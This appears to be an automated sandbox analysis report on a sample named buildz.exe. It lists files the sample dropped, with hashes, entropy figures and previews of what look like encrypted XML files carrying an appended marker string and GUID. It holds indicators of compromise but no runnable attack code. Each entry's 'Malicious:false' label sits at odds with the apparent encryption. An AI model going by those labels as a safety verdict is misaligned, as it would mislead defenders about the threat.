                        MD5:4F5EB85F59A05C8D69CF8E5A21931580
                        SHA1:AE8DDD31E6C7B6530451DAED55904C935707DC57
                        SHA-256:5D7D43CE6F225B6A4941EBC65F044CC27B7D9ACD2A7437C922DC092E8A305138
                        SHA-512:BF3FE1E249A4FC926F90A49E55172BFE852AEEAF3C6479908C0A042EF346AFA82B4718576DF9FF2B46B2987CA582916B7C63FF6381985DDC7AFBA88C0DA81893
                        Malicious:false
                        Preview:<?xml...........Z....{.md*....~.x.Ql...Z......5.j.<.u(..aN.._.l.NW.?G.....#.)....x......6/.F..a|AJ.8.&...t/..U....0&|...g.CE...u)p...=....A9sG..:..;I'y...@......X.=...~.V..2.iena3..Vz.,r.R...J..?.DX.....p,.....=..].].l`..."Q.Ta......U.e.=.?.6.P..._}."S.1..@.+..Vk....H..d..l...a.^....L.Ih.....o/k3...>.E~pX.. u}.=>tp..y..|......E....v_&Z].B.T.9.%......B.A.t..`....'N.#.."(fx....:..c...T...0.....<Z.S..r....Y."..#P!b..+w.....9o^.{8.'......jT.w&{oo'.!.....'..s..J....4..i..i.U...<...#.....$..%..p.G.rz_....."2V.Ur ..=.}S.7.'w.qH.K....#...R.5...u9......V....T...>Q..H.V.....*.+......[...Y......x....T.*...2.Rw.....f.81....b_.8...._...>2..c..9..q..+..r&..Z3........I...E.k...`;O...aq.k.I..&..$..C.7..g...1.~.uF....zZ.bR...2....7s..=!j..Xc.. .#zD)....5.}....{M.....[..' .RS...A$.....S........$..m.......p.;%......T .A!.....x.7......H.....e..X......g..b..i ..{....L..(`...H...(..fh.$...Y^es.,#... .........LM....A.:...2k....q.%*;.&].C.?a...q.S._....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1176
                        Entropy (8bit):7.822651279717159
                        Encrypted:false
                        SSDEEP:24:8Eca5ErJPXdcN1gRzJBwmiOw3jBZrBv+yr9sm6pn2imYSZu09NfvPC4EHBM5/JGX:Rcau1SNkz3wmiJjB9RWp2iMZvNE+LUD
                        MD5:683EB1C2A53232CACE82CFB821C42FC5
                        SHA1:81053E3E24AEBE31BA9EC412E4FDDE08E757CB6F
                        SHA-256:D2221D9B24E04AB5C7165D9E239819DB0408CF530411482F0A6E2D6A7451DE08
                        SHA-512:382A079AD85AEC6F1B19C85050C300C0BDBAA64B007885E88F6029C6973960EA0111C10B4AFBC14D2B4A70B046FB37628EBC7405CF830777723E8AA5606376D1
                        Malicious:false
                        Preview:<?xml.V.^.....D..6v.@.>.......6&.i.CD........f1.Ox^...P..'.,e..T.+ .q....f..>..).....,w...KX...k..p-..F.)..Hw.y.....1.s..@Q.d...,....sU*....Z.}.?/({kED.S.`...m...Pzl...1...>T..vTe]...og.......W?.G..&....P*..p.j0.Zy.U...t......_HxR.9.K..%.p........<..5.=.Z...$T._n.o...K...r[..k..f..+.$&c...5lqJf..Z.a.s.6..../}V/&.......f.qbgZ5..50~m(OP.c.q..p..J.....`.G....N...w..Zx.w.X.o>.c..'e....e.d.....HF..'.7.V....).Y.t....\.Fh&,....].L. .w........._..g...-....?..<iTJ;..E.p<...^..:.....\....?R.kUZ.....".ql..(...fz..lX.f....i6.dOY.r.....N..P]b".T..?.9-..m....k...@..U1..3..n..S;z.+.S.......T.t.P.*..$.~...A.}o.?K$.e}.st0,....J.0.....1Qwc.........L..8I6w.x..>...(...R.<.g./."..!B}k.7.8.E.1...IG.......@.?l...M..[...f.......E.)0V...O.9..p.......T3..r"...Y.. c.XGLW...9....=.7.....xeY..-.q...DP%K....W-.W..!.<.qz1..g.....!I.Q..3L[=q...q...V`l.B.@E.8...._C........A..6.R..].h...*9c.[....N..W.4bn.?....,......gb0....F..kgF..n!GK....up..3.B^.l..H...<....8b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1155
                        Entropy (8bit):7.814058081759706
                        Encrypted:false
                        SSDEEP:24:7BTzCkD2xlsPVY72mrzFu8yDESXkXAT2mr5XSBqsqrD+7216U/eBsGbD:9TJ2DgVYSmdu88ESoA62Vsm+K1fWuUD
                        MD5:85BA11416E19E50EE754BF3F802907C6
                        SHA1:755F6176CE390AE3645E718F76A93F0F631B91D2
                        SHA-256:1CD2A8FBA638967B108143F057A144447AFD2ACD2EBDC88AFB9C8DEFE31970BE
                        SHA-512:ADD3798E968EB17BEA20B144C6E8FE8FF005104A9102C6D39119A03B53595D4E8AF6F2242C884AF53C18CB50442F1E2AE6785D6D138C186F7B6C7F92A382A85A
                        Malicious:false
                        Preview:<?xml.......c.pxR...nC.%..4L..S.....!.\g.t0A........[..l5..'.TIC,w.U.9cBO.-...3..u..J.V...l.....5..5k.7,............z.! .Y....L..q...5):.+.d.U... Y.........9j....v.N..HR.......h....o....B.)....dD.K..C......1......l<..P3...$......Cf.....r.Y0.B...B. ...=..A.;T......F...F..G.l..wsV.b.....y...+..P.@.......g.......EL...r.5O.Vw...C.4....c.C2.}..O.......{...\.z... .......w.L........)..).Nv....8'j8.....4.V....mv..gm...u..@.w..M.....C.._!.......]Y.9B....f{..x..u..RE.....qA.i.8...6..........WR....G. o..Y.....P......Hqy.E>;...3..N.m... h.....o.'..l{".@y..7..5To..J..?.w..r.n.. I"b.....~....w.i..x%C.[.8.uG.G.....9..z..%...n.Mh..N..\......,...J.p...... ...f.l4.H.J...o?9`.j*.*}?....)w'(.D......eN...+;bZ...k.....6}..k..ol}...)..2~./...Wi;..C<..I.@'.k.(..V9...;KE8%Ik~5.d..\m.....5..2...L.\(.OK.0...Z(Qr.....~..#.....EnV.S>S.?...U............X.......h3y..u..Td9..%..w....@.n.M.?.u....PT.).......^.|a..3j........wT....7"..ch..s.m.....u.p....GL.*9
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):715
                        Entropy (8bit):7.66294705695264
                        Encrypted:false
                        SSDEEP:12:C6ekXYyJbY+iCZJcK1kjH5+Bmb/wML1rLh90EVxPm/CtNRyJG0d68Ib26Gcii9a:CrkXYy1Y+fZKKqQgwMhnkOIC0U0d68IE
                        MD5:5A93E6CEADEBAFA67EDEBC414295277A
                        SHA1:1732DDBF2369219523B552578FDF44738638EEAE
                        SHA-256:955E889D28DD8E3F6988B81A528E39375EA1B8B457AC06E89F78C2D7CE66E7D2
                        SHA-512:D69E84CBDF97CC27F91556ADA5C61A5BBD6E403E9921BF51C4DAED4E9C2F5643DF8A7BAF4D87198713708C8B606A88C10662ABA94781355140BF017202AFAE5C
                        Malicious:false
                        Preview:<?xml.o.q*...z?..Ru..=.Q...U.KD.P..4.../;....I*..V|.F@Ek......\=(.y....].$..`.GY\.pslV.wmC.d.i.p..>.R.9.P...?....+.H..E.&...HH..(...u....C%]&E|.i..Q..(.$.O...#.g.-..~9.....]..F...].....:X.-H...t..'.(\.6..I.J..6l.e..cp:...b.g.SM.......l._...:<..pVm.Q.j...Q... ..yw.Z....}BW;.p.2..wx...C......m.f.[..r.......|..,.C.BI/X.o..R..i..H.}.......{.....O..$+5....G.r........+;.V....b.../.......35......0..5.........f....M..Uy6U...t.....F..!i.D*...6.l/..^3Z#...Y.9.X.V.m...d.'piV.Wl.....qR.G....[.m........6.C..<n.fh.b...D.......M.w...io&..5x.Q.q..u....3_......6....F.u.7..q..[....}....C..|.[....d...qKX.U.."P...4..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1398
                        Entropy (8bit):7.837514947728954
                        Encrypted:false
                        SSDEEP:24:dsb9W3FpVfYl0xb0zE8uEYQbsWec3/bptspc683ZfyAEbD8zeAR9lYHGbD:+p+FpVfYyb0CQ4Wec3/vEAEn6ROUD
                        MD5:004D8ECBBA9C625393B3B83391B2A226
                        SHA1:9510D58683950F3A900CCEAFD3FEFD463B50510B
                        SHA-256:4EB41D60C1A0922DAE259B6BCC631672A29BDD6194BA6EB879C94402159D16B3
                        SHA-512:0C9A81ED50FCA02D521B0FC73921253AE8B33FBDC4EF1E1405E8EB969F55900024EBE5B861A97F95C5190D8A74A00B60E2420DF1CF0A6EE03DCA986B4693FC98
                        Malicious:false
                        Preview:<?xml1..J*.,.*.*.A\.....P.?6.Ij..l.j.j+..G...R(JY..[.......-..m.T.....HQ..8.G.!JC..v.}...Z.b!.3Q;....S...M.G:......5..de2....../.....e.<...h.....o.O....V..N.&.)...&.-$..y=J....o..[.??M...c.......a......T1.H....Cv...H......K*;?L1.U#.s..+.D.....".....8.r....o.B...O..>.u4I...l.?5...de.3Pn.E.f.w].LB]S~.0F#..^r....g.L;Z.`.)..&...........s...F...%EB.K(.#A{.).#..Y..m...d..s|..".[p..*8r.1.0.o......V..V.bK.@i......J/..B....=..W....g....U..[N.z.r.jZ....}L.+(..`.P.."..\C.UO..>...y.99..{..%_.9...1}.kw<..H....?..JdTkT@..>(GY..V...5oq..y:..].....8e......6.3..e=5(D.0`...>di).....i.(...^...C..'(}.a..H.m..Z-...-...R83:..GT.G....k....G.\.d...u......\.{.s?{|....#.WdB2...n..^&.d.'[9~o w'....Y+&.<6.\C.....70.. .............N..%....h....).R[.\...z.U.$^...F.v.!v..5..2`.20\..&...!|n............7.TQ.}.....A....F.8.(rN .......................0.Ei..Moj=.%.?.j.G..Q..h1.o...Pp..G....-R..U...1.....2'...Q.&a..F..I.H.%B.....>.0).(>..|..P.{.....&....8..^y..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1008
                        Entropy (8bit):7.806008789457924
                        Encrypted:false
                        SSDEEP:24:Dg4Rmm5HJZFSlGnA3NZu/lby5Ptz+bXZgWl/GbD:04Ym5JZFSlSCOlW1tKbX+Wl/UD
                        MD5:8667C31C2097E261B487AFAD8D7B2A94
                        SHA1:300B134F2AE19E1542D5559E6C6464516075497F
                        SHA-256:2F8D952102F593D4A8803F5507C9C2DE471B35E16F90BB968A9C3AE23AD5BF49
                        SHA-512:2D192C61D7597A80D45431AC041A8B69CFD703C6E461644AFBF0A415FA9B948D6DB7ADF7612F5083811E100919C53F199FA8BA16DEFEB214904E78640B414ADA
                        Malicious:false
                        Preview:<?xml..MP....}jD.h.w...WA!%.ML.8...Y.s.Z..PO...@...tQ.._.....x...u...[y'.$...#....C.......;.9.[wnd?#LW[..`."...6Ef..d..3...oW..7.._y..9..^.^.G?N..}..#.$.L....;..FG-..k...w.....hrs..K..:..Q.(0...6,.e..=...............ZO.D..eU.....n..;h....[.._..].sc6-.].S]..m.G*.a..,..y.{..{(.......S.....-........<.2....`..... V....r\..Ojx......I.%...t3....5.....-/`.....U$.:.s.Fw.u.lL.zi`qu.>...9lD.gW...$.4.]N..g.....tx..Z{:.R...WOfq.~1.uIq........T...{o.= .?+...V.)_..Zq..I.-.......mz...x.g.*..B;.}.w.....@1..C...*....m...B.Z.....C...4..:xe.x.y..[..^=.~.-.s...7.... .....@I......"}.Vu>4.....5.-...{.&W?............X..w..=.......X..Xb..K~.7..m1.8.T.h.)}...1u....6Z.....J.\c.c0.5.R.(..'$p.q..-.....d.eo..._Q.r...$...-@5z8.m...P..3d|p6....a..n#b......+Y3,ru......A3.9...l.....,...L./.>0..8.I... .>.+0..m.....l.o.]..`;.B...+!k#yc...Xg.I.y.1{_...[*..v.....G=..e....FVJ.Z.bT.._.i.W...1p...c.g*!.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):719
                        Entropy (8bit):7.692410734666876
                        Encrypted:false
                        SSDEEP:12:6H5aKWat830Gp1F5kg/vwLejCkTZDk8gXmT/bD3SIB+TET3QU26Gcii9a:6ab4GwLejCaZDJMC/wTI5GbD
                        MD5:BBFC3B133B1CC8E35690699BCD32CE02
                        SHA1:2F06AFAD5968E1A4990EBAE6902981ABADE54D09
                        SHA-256:92D30CA74ED3CF94A88688B292B3299E8DBE2158D9DE5B40C84D97A243D07F60
                        SHA-512:A1A1F72C0EFF15B9D7C85C44115A33C0F2AD4F1A8498D735C27B1E0DD44A41CC701370393A0D6DE8E1A89198070799A919A015FBDD36A3BE82176ACA44B44943
                        Malicious:false
                        Preview:<?xml..0}....'v..:...@$.bF..........^.}.S#.....0`7...A[.b.......XR.>-3..(/q.5Q...i .GZ..C.)......m..8....5F)...@.}I.Y....../..dg!...H........Y"e..E.Q...A..@..J.y..4.......^.m..V...a..}..J+.P.....:..W.........B...P[.!.oa'W.u.V.y....G.....k..<.j..+H(..4..2..i%.C#.![..o.<.h.HC..M.6..2X<...`...j......S..;R.6....]l...A.w~..o.S....z2.y...ce..kn... ..........T.B..b.....@./..ia$l..;.."!......I`K/......3..|...K;.}?L.b...Fv.9b....pd..%......7h%.U.L.,.d..i*.M.......A#.<.@.}.g1..W.\...Z.G....\.B.S.\..$...n@..D....,. ....m..4pP...}..?p]sT..`..kN..V...Y.../.c^(.A9......d..m..r.r..<.A.J):.......s......}..y........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):793
                        Entropy (8bit):7.718051422630078
                        Encrypted:false
                        SSDEEP:12:ayzuKC0mav/409CnZVQbM68s+57uNv0glygEc4hs1sOtLvMPg/tb/26Gcii9a:cKyav59C8oZ19uNv0h0faOm8tDGbD
                        MD5:A7AE5F5DC292F7470AACF0A145BF5FDA
                        SHA1:B97E302837E42D77FA6978078F77DF05028AEF57
                        SHA-256:A43246E23F4902228938954477CFC50B8E0DC3E7EEE7529E39D22F6E64924922
                        SHA-512:CF78FAEDB7D1A0D29B2A23642BEEA6BC14E4B71F219E024C5B668A9F2032C95C2A6EDE4757460465A0A7BD28D0A10AF5698641844742EDFF14573AE96A7B4371
                        Malicious:false
                        Preview:<?xml.E_ q'..\&p[......4.o....(.e.Vtfp..W.;....=.(Ua.9%k=...z8.T5.{.\G.MV.Od..^R...e.fU._ f.p..p.l.g....fpP.^..z.tE..;.SN.....\'.X...J...9..g.&.Og.3.,.....#R........:...B....u..~l..1E...7.N'#.7.U.w...%..X..c... s...A.....l.W..:...3..N..cV.=......s.......0"i.r..q...Y.........qv...>.H......$[;*e..6,..aQt?..N.....y...w..u..r..^....b.3u.PDV...m.....R......"J.H1.US.0..8..$.P....q..GM..8..$.A...!.>}.Ue...u..^...(!..;.J......#.....q....;E......4. .Fk..x.:.d.g....v..;......w..U..q.yA......R.ap..9'.vRs...U..q.....88"]$........~...e[..w.+.........9{...":..f...D..<..c.E..MX.......2..|.h..T`........9..W......d.....GU.v4dN.....L.F..b....0.+......fc.Y..#e.M....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):761
                        Entropy (8bit):7.699548228553788
                        Encrypted:false
                        SSDEEP:12:0Av8fnUhhxdEBNGJzWkwSF+P0qFCKCiBTvlKlsKzIPE3qtB/uumZ2CY/26Gcii9a:bvK0ws9WRSgMqFC8dvVy3qtB/uusZ2GX
                        MD5:91D9342975B806F5BDADB2950D4D76A6
                        SHA1:10836CCE18B932C50B455F675CD9F89127B03B88
                        SHA-256:644E3845BD5D2D857B591AAADA28BD979E4404B72CADE2C74C1F192CA31928DD
                        SHA-512:57DF2837A3E8DC8B0200348125073002A184FB9F869762F7656CA96EBFE7EFF3105E2DE650F33C233DFAF57F181B55CC084E696EB647140D398AA2DF2E1F6B3F
                        Malicious:false
                        Preview:<?xml.<..../.?........Q..E.Z#..g.C..AB..o%t...Y...........)+.^BW.\..w.+q.C..v.M.BG..W...}..D..P.RwF....Y'..k2+.3..NZp"..M...W.9".l.{.+pP...j2{.O...7x..e.b.....q.g..9$_J...!.(.....{.[)].#..&.,....(5^.kK.......L..<.Q......w2.`..`..._!t....iB.).,&uM.....Z4...........N.Pw.^...]!.G1.N...q..XR.V.-~..@....\.7....d}j.......o..\b.....M....]..Rn..ueE....rH.!C."..r..^.\U....}.%.e....7....n...4.....JC..mw..<...,g;.-..@.+.(y.X...\......H...`l."......S3.)K.......W.....B........U..h?.....tw.....K-$..X.....D./.....[.S..q..x.'j4R.P..@z.;.\.~.O.`..G...I....... ..*..:.!.1nfU...8.Ov....%H..5....D...;.`4....-U......."i=.../...;Gs...X.[.&d.....?.bE..Z.......(...Y,R.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1306
                        Entropy (8bit):7.823238844645431
                        Encrypted:false
                        SSDEEP:24:jgG4db+HXwPKXbRHzMbjBNl+qRvGJ0pKMUIpVEBGIzrfcNVU8W8jGbD:jgGKyXEcoEqRvRuI0DrfcDU8W8jUD
                        MD5:A924308E93C7687091095CA58CEA2F77
                        SHA1:4D87FE1D19FF253D178B63C5C4511C5101D0FD9C
                        SHA-256:AE8507FF6EE0F49868D9EA7FD36B26F2B36039822E539A314C87B679DA35013E
                        SHA-512:EC9A7277463A4325BFE30E17F50068034F4842A72F6DC7C68688715EC070CF638DD722FC26683913DFDCC912E8F63BE23C0CE3C571D21D676370192B00E70670
                        Malicious:false
                        Preview:<?xmlA}...^..e..K/...\9,...}.......1c>...E......#.>.T.1.+.../..S...Y.......\.v......6..!O.._*k'._=.....e.V\:.K..L|..7.C.q.0..x......a|D...~U.V...b.J.(.y.PU.../6.3.....@..<o.y^W<h..l$n..xo.`.D..9.....@.B._.c....+.....;..$?L_|..9... ...._....,*U..n.Lw..7O:.vv\1...@.f..~.rXV...3.z..D...P.. KX..:*....5..e.\4a?.e....#._~.......Ja..$.f.>.caY.....'.....u..I..).\.Z:Bl..r......}..x..*....tXE~.!..cFV4....{3:.D:..O.#-.....XF....*....I._.dQ..0>^.../..DT..B..zQ.sf$....2~..N........K..I..`..'t...B[MpmJ....K'.G................!.#8-+U..t.w.U."Q:.2.+.Z.b.V..Jx_Y..Uq.3.$..WE1R..D.3i.9.....v.x.T....q/~.$....d........\..B-->Q.....r...7..3....Z.4p.P.k../.......4..D....J.j6..p..I.v..s.x..t2J^Nx..b...(A...-...;..V(....0..!c|.v%.<.`.....T_.Z.,....lA.w=.r.,...Q....VJU.+..G..{.c....bp.........o.M....].v.H).@V\v..A...".d ;.....=.........^.Wk.nq.#......h7....>&t..l.....Y...,!^.$.'..(.#+a..8O..7.{@.l.uze.I.. ;......<b......H......5..V.xUI.e.B...D'.YO$7.g......d<$..8.qV.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4285
                        Entropy (8bit):7.960423758437864
                        Encrypted:false
                        SSDEEP:96:YTQQYR3+c5lMJxxwiclzerhiGPiT7yOg3hkDfyUgyP2cD/mDhkA:YMzugiwWhgJg3WF2cD/m1kA
                        MD5:B0DC2655192FC1719BAA11F1CB16930E
                        SHA1:B34287F5743437F10ABA30CDD2D30135AEB28313
                        SHA-256:97068DEE9B719BA35A87F4D5E50765E138C7AB019029377B700BEDDE0BA0C05D
                        SHA-512:0532603F393F9AC6C6273826165874C79CDBA2CE42D938725613C6EEA4B7F11EAFCC606074F71648FB07FAC10880AF7EBC849037C33D41F762FC1E8D2BB2ADBB
                        Malicious:false
                        Preview:<?xml.........r.v.?r?l........S..4..Z.a.7......vM..c.b...Z...R...l...k\!..S..r..B....Xb..`."GhEK)...L..H.....'...e..X~{.....d=..1. ..{3`.f[........_.6u'....$.<...........U.!.0%g.AzcL....]..mP.!.wK....M..l.......*.d=..e.....@*...6y.}.d.."..f.u..Z....#...]Yb....A.v....^...z....A4n.3.H..ms..F|.?...~%._...3....e...H.E=.91....k..[."Zw..+.A...,..3q\...K....D.q...<..........%.0j...~.^..Ty...1..'p..<y.w.....-|....~..n,[.p.}*..L\..t..9..J......Z.-O......o.7)4.B..^.B<.Q.o.....NfcU...F8............znm...V;%...z...U3-....'R....Y...y..B..J...;}]...@...S[ .l3..+....R...H...w........0...@.>......m.W...RG\5b.9..y..+-k..GS......2....ht..N.I.t.I<w.......^..N....'.mkXjr.O.......0..(a.1g!...i`.)z.X6..e....h~u..M:.N..jJ...;..{&...[e=,.n.i$D.'.v.t;@.s..f0.*;..b...L..5.).3..40..8.#[.n+........B..I....4.(...M]....L..c..h...U"._.o._..h..y\.u.l.}...HZB,..N@..U..x.....l{..."....%.0...9c1/.=..Zm..'.......h...'..8A....2N.w....F,..^g.#.S.s..q..../....(.#x..zi...ND9...y.}.,I.J..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):854
                        Entropy (8bit):7.746882550466388
                        Encrypted:false
                        SSDEEP:12:h+zj+pJ6mP72ixtdPa59gEkxAo2Xw2ZRBMvf6CJDLPJyKrtW4RAxEt26Gcii9a:4n+JXxt5c2EkoXw2ROvyqLPwuA9xAGbD
                        MD5:E4ED4F9E368BEF5DCC5E0DA3333BF32C
                        SHA1:434226B73E68FC4EE3D09DF0A428820E73A8274C
                        SHA-256:C3F78086787286EB35CE34BAE37336900A7C5EC7BF5BCF147BC5E960DE68FD4E
                        SHA-512:639A8464AB89EDC257A525D766B1BF67AED577A21542FF42ED1A7DD84A0FA471ED409F08B06890C33C0EE8FCB17FD2F1CA8E8B339FD0F4AAA4BE78B4F8F93323
                        Malicious:false
                        Preview:<?xml...:m...{....=..D...X.....$F}.U.;......N(n.W.?......j..7PF...rA.k.......L.(d./J[..6..3qS<.]...v3..~....M". .>..Mq..U...K..E.r.'.....}.....:..rJ@`h]...f.z^.y..kA.2.....#.F:'...>....1....O...2.^M........H.&..U..+../.J.N.].........o.v2.;.+.l...A.U.-..?..G.......V.i.T...5.4...P..MYi........._...4............@L..%.{..!7.R..3%...H...#Ca.{+..lq.._V.<.0~B.Ke.u...n..H.q:.......r......J.P......Q..?...;.b6p....3.f.\..T.&.4....}.+..c..i.......>...>[.........@.4f.<@..L......=....a?.~..4.l.. B.="...,i{I.... ..k...@O}.......[/...|.a.1V..,.*E.(...u..{.........f...!..th .....DX.p.q]...R..9.v.&tG.t...Ke...L%F.~H.|...\....Dn..M..[A........Gl..0.3UL.....#..{...Q....?..Z.<.o.....n....k.Z>.}..}U.-.[..L..g..P..$.a....w...A$..s..u..p3.M.q.x.U.ht.....4.uEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):929
                        Entropy (8bit):7.698548651863424
                        Encrypted:false
                        SSDEEP:24:YawxGRDmF96uRrPlt2wIyWcr27nbfsTDB1+0JoxGbD:SGc6uRrdArcr+rspwBxUD
                        MD5:DA6BE2C1527F0F5F8C79C7D6A948EE2B
                        SHA1:B2A0199AB45B787C1210179C23C8B27A0C82A10C
                        SHA-256:0DC053F2AF8EA4A55FB7FFBEFB1E3312F99D753AF9F2CF5EF5068C3B69E88600
                        SHA-512:8D88B0D3D228F907D4CB08EDC55D6988490F31E85CD7C1ED8CFEC2190A7ED459B6653C54F3AA4F6304C14BB2805220DD1C88E873C4F9E3B3BB2C09D2BD5BB367
                        Malicious:false
                        Preview:<?xml%E....z..U..<P.7PF..W}N....+..._c.[?...x...%/..w.E..0....%E.LC..!g.tf.......Py).....b.g.X..5...L.w.z!.f.......v`D...G5.v.f..Wj5._V.)p=F..W.(.E....1k.R....Ci........9..)...o.3.^)......4.l..).;.)....V...E.P..Zu.....N.`~...6...W#...y....l.i.z'..y...>..{....E..D.k.z4i..a..qu..##N..4..w.7...DdU|...g2..[..}D.....^....l..a.a..e...y...b.....Hf.?..Y..+A.U..a.5..`S.:..n^.]..:.&.E2..IY).6..\.Vp......&.L*..M9K..%k.".n..7...Ox[fL...q(q...`>A....K...5.._..QY.p...@.?.q.i.xweqHkz...7l..l#>.?.q..D.E.}.#.aNe.v>P..;@..<..#%MfR...F.rw3LI}@76iu.Pq).5n.z.f......e.9...x.0..B:z_%.4]IE*Tp>..~..H......c..k......8..'..NF.......8.e.]..../P:.^'.NOv..\..(......^>.x..u.bl.....(.$...e..{`........=##E.vCx...7q.......kzm.G,...wc....?px.L..... .......6y....`...?.l..y6<E...q....h.r.[.1T....\.#&w.s...;...~..R.o{al..X~6...n..]...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):722
                        Entropy (8bit):7.642427012842156
                        Encrypted:false
                        SSDEEP:12:I2RxdHz6Vvk3v4xYm7HCu3eHaYean+qQAZBXy46Bt1+0m26Gcii9a:I2XdT0kfdm7HCu3eHu2+qQAZBXy46r17
                        MD5:4360011064B3CBC07D099C35C8E03EE2
                        SHA1:254DFD224BBADA3AC552582DD7B2194AD557607D
                        SHA-256:317D2DAAF1DF1BA012B0619D3A7ED3547D62089A35349BBB19D67C90356554AC
                        SHA-512:6340E11BEF07F3CA39491C2BA0FCA6E1EB6F6EDC98D763092B9D800C213F139084E3281F61BEE2A2DB8ABE9086E3F16BA1C22C9F021921752CE7D4EC22193EC2
                        Malicious:false
                        Preview:<?xml.qH....<.L..m..a.-Q.|!...E.......O......#a.n'.X`..C.l...m.....%./.jH...l....5..D.?H....c..&i.B.. ..n.l..)..n..5....<..ODO.nt..PV....)..A...X./n%.*.}.C3.|...F.(K.4.g..A."4..7e{5z.^.\...a..rh/.j.....v... ..)......'K..K..*|8_...4....!s.l.\y ,....)o...i....&W.....\...{.U..~..,.....rv....0::.'n.7.*9./.{N...H%P..A_......C.o.Ds.._$q$qQ....i.i..5....{...I..)<..!(.%......P.zE..UrX.7..Ty...*..... Z.....VX.Z..<&..v...<\8..En..c~.._...N...S...v.m.'^.).3....6............K....4..M....v.l.Dj.8g..6b.m<....]..k.'...0.%..cs...!.e...>...b.>.J.4.t).2.[..e..C..MW.._.i..i.......u.{..l....%U.:b.0..~I.#}<.M...8.I3...=.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):935
                        Entropy (8bit):7.767073716310471
                        Encrypted:false
                        SSDEEP:24:tBAXX6ui9OJGkGHVUaRxNoPgORywMYsex7vGbD:PAlqOg/XRxNTOPP/5vUD
                        MD5:E386913B083323C6489D6D3F451B625D
                        SHA1:4083E5572792CAA77358119B1867FF217C3A7416
                        SHA-256:4DE802E6B8AE5E05741D37CEAA0C2BAD1B795CE6489FA802A1226B33E721ECCF
                        SHA-512:4A5F94BBA0B1EBF143C7C08EFBC9B39749E6FCD71D75092BFCF838E0C8216B817E8B54418E2902439B5173B57F8414BF25B72639628F6BDA8828EACEF7ECD6FF
                        Malicious:false
                        Preview:<?xml.....,.....u........v....L......,........n.=..p..1@.......z.~M.....@jKR.>...&..8.yN....un.S...NI.2.r.5.C..`......`.].".X>.,..:{....:.ZUDljPA..j@....^.E..*W.o7.I......Q..3..qv2.ikW...E.Y..I,.^S_...]v..F.m....Z.2.A.....=...}.l.Ox..G.......}.....S.A....:../.c.U`.4y...%n4....+.J=a...r.HG.......C.......A.4d...1$.mu'.5.n.x......}.........\....I;..Zo..N{4.....@.L.OG...Q..iOHI\.........$.t..b..W.....E...0-.?..tH..6K.C......~0#.t.u..#qx.f.......{...[......}.m....g...r.K....Gg..sa...e.[........Ipf..ZT......dOSZN.|U6I._.+<....RK.yX(.^{.:Lf...\.-.\.%.i...;.V......C..f..~.w'i..q.QJb..F3G...5.].[.7..Xt..V.0.g..5..Ma5......G3...;D.f.?.....b..dZ..gR...N....kK2.gq|.5.}^.q.K...<.}]Py.*$....g....h...I.5.Q..S...+..[;....>.....;..$p.B.u.p..8...%.1|..y.RY..... M.Y..7.g....=/.g{...s.W}.)..O.#O......h|..QUr..1...^..N....pEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1357
                        Entropy (8bit):7.851403903281848
                        Encrypted:false
                        SSDEEP:24:dIWQYXttJnBOsVz0oq7FxdApnQqbeUW2vpIoKU8sLijJbpe3xDltW2i1N7w5GbD:2WQYdtJUsVrq9eXeUW2hK0mjLg5+L0UD
                        MD5:25861CB99541A93CDE473681E454C176
                        SHA1:073D535EC78BB0BB3E6FC30708D3A7304EEB0F60
                        SHA-256:EB9C463401142D10D005E1F7FD90FB5736240248AEDC360ED895A6EA210B531E
                        SHA-512:B10DC72951391E5A46214F6114FAC7B81A1844156C1DF385FBFA69C7CB969A7122D97CEC16DA80DF6886F2B431ACB295BC98282BF688ECEFD396F7078CEF6D05
                        Malicious:false
